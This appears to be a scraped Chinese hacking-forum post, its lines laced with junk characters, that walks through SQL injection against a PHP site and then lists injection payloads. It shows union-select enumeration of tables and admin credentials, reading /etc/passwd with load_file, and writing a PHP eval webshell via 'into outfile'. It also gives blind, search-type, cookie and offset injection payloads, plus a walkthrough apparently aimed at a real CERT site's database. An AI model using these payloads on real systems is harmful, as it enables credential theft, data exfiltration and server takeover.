我一个朋友维护一个站点,他对安全不是很懂,就像我一样,呵呵 !O(∩_∩)O~
# ^ h3 Y9 b0 e让我看看,既然人家开口了,我也不好拒绝,那就看看吧?
0 V* Z7 H" p' J2 o我个人喜欢先看有没有上传的地方(上传可是好东西,可以直接拿shell'),其次就是看看什么程序,有没有通杀,然后就是后台,最后看看注入。。。。
* n3 {# y2 |: \8 ^/ H A( w如果是php程序我会先找注入,呵呵!(这个不用我说你们也知道是什么原因咯,废话了,主题开始。。。)0 h, a1 y" M3 F) S% ]9 D0 ^6 m, X
1.打开地址,发现是php程序,呵呵.既然是php程序,先找找注入吧?看看有没有交互的地方,(所谓交互就是像news.php?id=1,news.asp?id=1这样的,); [: n+ V: Y# D3 l; H" s& A2 L
这个站很悲剧,随便点开一个链接加一个 ’ 结果悲剧了,爆出:
7 a. m$ ^7 Q6 y+ Z! U6 sWarning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in# N! j# P2 f5 P$ N8 P+ u2 o$ I* Y
/data/home/nus42j1/htdocs/news.php on line 59 ,物理路径出来了,到这一步啊,已经可以证实存在注入% |, z" y" J/ e- T
- ~1 _, { X1 G5 y) N
2.不过既然是学习,我们就要一步一步的来,还是老规矩 and 1=1 ,and 1=2 ,返回结果不一样,证明存在注入, N) f+ X3 d$ u; g, t
3.下一步很自然的查询字段数:用order by+二分法,加上order by 8 返回正常,order by 9 不正常。说明字段数为8 ,继续提交 and 1=2 union select 1,2,3,4,5,6,7,8 - -返回一个3 ,一个5 ,说明可以利用字段数才两个,有时候会有很多个哦,要注意
5 c/ k# P, T4 w4.继续提交and 1=2 union select 1,2,user(),4,version(),6,7,8-- ,当然还有database(),等等.......返回版本,用户等等系列信息
- o) _* V' v0 I6 z( q5 }: L! K5.rp差了一点,不是root权限,不过版本大于5.0,支持虚拟库information_schema。, L) R" K) D5 l" @* r
有两种思路:1.使用Load_file函数获取数据库账号密码,通过操作数据库获取webshell, c: v7 m& d& w* R' T7 q2 b. L ]
2.继续爆出数据库里的表名和列名,登陆后台想办法上传获取webshell。# G, Z7 O5 `. | @
我就用的是第二个思路,
( V. [- g) R; t5 Z3 a. u- J提交and 1=2 union select 1,2,3,4,table_name,6,7,8 from information_schema.tables where table_schema=database() limit 0,1-- : m/ s% f" u E* H$ n8 `! l
6.由于数据库表比较多,这里有48个表,我只是做检测,原理是这样,剩下的只要把 limit 0,1 中的0一次往上加可以爆出所有表名,然后是获取表里的字段,
. n$ n. d6 J1 @+ z9 S. l提交:and 1=2 union select 1,2,3,4, COLUMN_NAME,6,7,8 from information_schema.columns where table_name=0x635F61646D696E5F616373696F6E limit 0,1--
5 U# P0 S: h# ~" b注意:这里的0x635F61646D696E5F616373696F6E是kc_admin_action 表的十六进制表示,得到密码账号后就到md5破解网站进行破解。3 Y* G1 z- ~% N9 Y8 Z& ]" _
7.到这里呢我该结束了,还要提供给我朋友修补的意见,不过写了这么多了,也不怕在写一点,延伸思路,如果你的密文md5破不出来呢????怎么办????
# {9 r. m& P- q7 P& a$ y是不是放弃了,当然不是,看看开了什么端口,如果是centos,lamp环境。我们自然是用load_file了,先验证有读的权限, /etc/passwd.....
/ u" z2 V8 a2 W5 x4 N8 ?! H提交:and 1=2 union select 1,2,3,4,load_file(你要找的东东),6,7,8 --
9 ?; F3 K6 k* M$ o7 t然后你就找你要的信息,主要是一些敏感文件,还有就是有没有前辈留下的东西,比如某些记录口令保存在本地的东东,我们还可以通过操作数据库备份出来一个shell,# |2 r2 C% {6 P9 K0 u8 e
调出mysql命令,执行:Select '<?php eval($_POST[cmd]);?>' into outfile '/xxx/xxx/1.php ,也可以分步执行建立一个临时表插入一句话,然后备份,前者比较简单并且不容易误删什么东西。前提是我们要有写入权限......
6 V/ w3 U$ W( V5 }% T- T" B下面是一些很普遍注入方式资料:5 F, X8 i; |6 S, |5 |( X
注意:对于普通的get注入,如果是字符型,前加' 后加 and ''='
9 `! s; i+ R6 e; z$ y& S拆半法( n. K/ i. M/ G& b/ f
######################################
. Y2 b q6 y% Z' c! t+ tand exists (select * from MSysAccessObjects) 这个是判断是不是ACC数据库,MSysAccessObjects是ACCESS的默认表。) N' ?* o, O0 E2 A& Z+ f7 P, d
and exists (select * from admin)6 G( I. @$ z2 D
and exists(select id from admin)
]7 W4 g! a. }and exists(select id from admin where id=1)
" H1 y7 ^8 b. j; J/ I0 c1 aand exists(select id from admin where id>1) 9 w+ D' a+ G, k
然后再测试下id>1 正常则说明不止一个ID 然后再id<50 确定范围
( R+ `7 Y; [0 Q& Hand exists (select username from admin)' ^2 i+ Y, }6 z: i
and exists (select password from admin)
- z6 [2 h; b9 c7 j0 q% `and exists (select id from admin where len(username)<10 and id=1)
7 w2 Y5 D8 E3 T3 Y$ t. zand exists (select id from admin where len(username)>5 and id=1)2 f& M2 |5 ~+ |4 G2 D
and exists (select id from admin where len(username)=6 and id=1)' o( M$ X' w1 E/ f: _" u1 @
and exists (select id from admin where len(password)<10 and id=1)' Z6 L3 y& \0 ~5 s% N
and exists (select id from admin where len(password)>5 and id=1)( ?: {! o# k- I% {1 v* C
and exists (select id from admin where len(password)=7 and id=1)& N' c0 K( M4 ?/ p
and (select top 1 asc(mid(username,1,1)) from admin)=97) _3 e5 u/ i; O8 U; f
返回了正常,说明第一username里的第一位内容是ASC码的97,也就是a。0 w% Q6 t& r7 y
猜第二位把username,1,1改成username,2,1就可以了。3 |, {% e' @& C% Q
猜密码把username改成password就OK了8 l2 z4 j& I1 h3 V
##################################################
8 U: ^8 ?9 J6 m4 W' D搜索型注入
8 N. b) p+ C9 ?! _$ x" U' _################################### f6 d" V1 U( G2 X
%' and 1=1 and '%'='# Y# L- }, n) x0 B. {
%' and exists (select * from admin) and '%'='
* y$ U- J' v* p1 T Q2 e/ i%' and exists(select id from admin where id=1) and '%'='
8 ~% _% u! }& P# X0 H%' and exists (select id from admin where len(username)<10 and id=1) and '%'='/ w+ d( g- ?: E! G, R
%' and exists (select id from admin where len(password)=7 and id=1) and '%'='
/ v6 t0 e4 q$ H7 ]%' and (select top 1 asc(mid(username,1,1)) from admin)=97 and '%'='
9 ~" l$ |) z/ {! ^这里也说明一下,搜索型注入也无他,前加%' 后加 and '%'='1 `* G5 o2 {/ c2 {1 I+ K+ e
对于MSSQL数据库,后面可以吧 and '%'='换成--- u( p+ Y& L" ^6 `) |' O/ H2 q
还有一点搜索型注入也可以使用union语句。
& t. q7 M& A& [########################################################, n) D7 ?- r2 Y5 X4 u
联合查询。; G, `6 l" S: ?; U0 ?* x, _! G
#####################################
! ? b: w9 f; y% Dorder by 10
6 \$ T/ b1 p6 ?3 s+ j, o9 xand 1=2 union select 1,2,3,4,5,6,7,8,9,10
) e. d2 j/ z E4 y! r: kand 1=2 union select 1,username,password,4,5,6,7,8,9,10 form admin
: ~4 A1 x/ @1 J* @3 Z5 A4 land 1=2 union select 1,username,password,4,5,6,7,8,9,10 form admin where id=1' p5 U5 b8 |% E5 A; F( h
很简单。有一点要说明一下,where id=1 这个是爆ID=1的管理员的时候,where id=1就是爆ID=2的管理用的,一般不加where id=1这个限制语句,应该是爆的最前面的管理员吧!(注意,管理的id是多少可不一定哈,说不定是100呢!). S4 t5 a) r, O. y$ w$ c& F( k
###################################8 ~8 q. ^' R$ s
cookie注入
( B6 p* V0 j/ Y###############################
+ O6 M' o( d4 {# K2 z6 j$ j% dhttp://www.******.com/shownews.asp?id=127
9 X- } W$ P3 Y3 M8 P1 Q; ^- ahttp://www.******.com/shownews.asp# G/ N1 W1 k5 u
alert(="id="+escape("127"));
, f) L! S0 ~: r. u+ Falert(="id="+escape("127 and 1=1"));0 ^& J2 U" Y, X) d1 O
alert(="id="+escape("127 order by 10"));
, I- ]2 T: b" S4 ~) Valert(="id="+escape("127 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));/ q5 J1 U0 g% v: J# {2 t9 g& ?8 e
alert(="id="+escape("127 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin where id=1"));
% B# @# M+ Y8 y0 @这些东西应该都不用解释了吧,给出语句就行了吧。这里还是用个联合查询,你把它换成拆半也一样,不过不太适合正常人使用,因为曾经有人这样累死过。# o6 m5 Z4 Q: X( ~: V% c* G
###################################
: v3 {% v. p# S# A, B偏移注入- a: ]; E2 V H9 U# x5 [
###########################################################7 G- Q1 P& H+ @# h+ _6 `
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin$ t0 E8 d5 d# i- z* x; j* c! r$ D( M
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,* from admin7 s8 K- x( H, b# C
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,* from (admin as a inner join admin as b on a.id=b.id)
4 w0 }' f" v! P. Uunion select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,a.id,* from (admin as a inner join admin as b on a.id=b.id)7 C* n7 o5 l s/ O
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id): @% m% r/ C0 a2 l
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,a.id,b.id,c.id,* from ((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id)
; {0 t% \( l F; T. r' v$ `union select 1,2,3,4,5,6,7,8,a.id,b.id,c.id,d.id,* from (((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id) inner join admin as d on1 K& Z9 u B! |9 P* u
a.id=d.id)! s. ]5 p' `- }8 K0 N! d5 F
and 1=2 union select 1,* from (admin as a inner join admin as b on a.id=b.id)
; b1 d- y8 h& J: ^% ~# T0 zand 1=2 union select 1,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id) + d4 e+ x7 }/ _
& I5 i0 W% D7 }2 F============================================================================================================
' i! ^6 ~2 F( \ f1.判断版本
" l" ^6 r U) mand ord(mid(version(),1,1))>51$ k* \6 O8 W& p- I( S* C: c, I* E
返回正常,说明大于4.0版本,支持ounion查询
8 y, a3 o$ h" Z2.猜解字段数目,用order by也可以猜,也可以用union select一个一个的猜解
6 l7 B2 ]+ N1 r9 l9 i8 hand 2=4 union select 1,2,3,4,5,6,7,8,9--
! d# \9 x, y [& y$ @2 n. a3.查看数据库版本及当前用户,' _5 i' S6 ] m7 y- Q
and 2=4 union select 1,user(),version(),4,5,6,7,8,9--
' {; e' r7 O1 G; y+ X数据库版本5.1.35,据说mysql4.1以上版本支持concat函数,我也不知道是真是假,4 Y G7 w) s: q( h6 l0 ~# A" M
4.判断有没有写权限* g. H, j$ M0 e `# y1 v
and (select count(*) from MySQL.user)>0-- $ t# y/ N) l1 j+ v, G& W
5.查库,以前用union select 1,2,3,SCHEMA_NAME,5,6,n from information_schema.SCHEMATA limit 0,1+ p/ R: c! M, n8 ]; G$ V* s$ b
用不了这个命令,就学习土耳其黑客手法,如下
) y w: h& l2 land+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_schema),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns--) b; X5 u1 |8 }2 O. d. {" s7 B
6.爆表,爆库/ U! U/ z) A* x1 \6 y
and+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274--
- I$ X9 d: Z8 G) }; P7.爆列名,爆表
! `7 u5 |8 F$ m: @6 p9 cand+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+column_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_name=0x6972737973--2 ?/ @; u: v4 \$ m+ z- ]
8.查询字段数,直接用limit N,1去查询,直接N到报错为止。
2 L5 p; }& P; R/ p+ x9 Q$ ]: nand+1=0+union+select+concat(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys--
: W5 w0 v3 R8 O: S9.爆字段内容
8 V, e$ ~7 J8 l$ {* iand+1=0+union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+0,1--
/ V, O0 C: }# z" R1 l+ n1 hhttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+1,1-- |